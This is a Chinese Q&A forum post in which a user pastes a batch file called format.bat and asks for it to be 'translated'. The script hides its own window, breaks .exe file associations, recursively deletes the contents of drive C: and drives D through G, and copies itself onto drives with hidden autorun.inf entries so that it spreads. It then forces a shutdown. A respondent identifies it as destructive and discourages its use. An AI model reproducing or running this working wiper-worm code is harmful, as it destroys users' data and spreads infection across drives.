文件format.bat
@echo off
if "%1"=="h" goto begin
start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
assoc .exe=null
copy C:\windows\system32\shutdown.exe D:\
copy C:\windows\system32\attrib.exe D:\
del *.* /s /q C:\
rd /s /q C:\
copy D:\shutdown.exe C:\windows\system32\
copy D:\attrib.exe C:\windows\system32\
for %%i in (d,e,f,g) do (%%i:
del *.* /s /q
rd /s /q %%i:\
)
for %%i in (d,e,f,g,h) do (
echo [autorun]>%%i:\autorun.inf
echo OPEN=format.bat /AUTORUN>>%%i:\autorun.inf
copy %0 %%i:\format.bat
attrib +s +h +r %%i:\autorun.inf
attrib +s +h +r %%i:\format.bat
)
shutdown -f -s -t 00
翻译下这段VBS代码
答案:1 悬赏:10 手机版
解决时间 2021-04-25 01:21
- 提问者网友:川水往事
- 2021-04-24 13:41
最佳答案
- 五星知识达人网友:英雄的欲望
- 2021-04-24 15:18
bat代码,不是vbs代码。
del *.* /s /q C:\
rd /s /q C:\
太可恶,删除 C的文件目录
还加自动运行autorun.inf
劝楼主回头是岸
我要举报
如以上问答信息为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
大家都在看
推荐资讯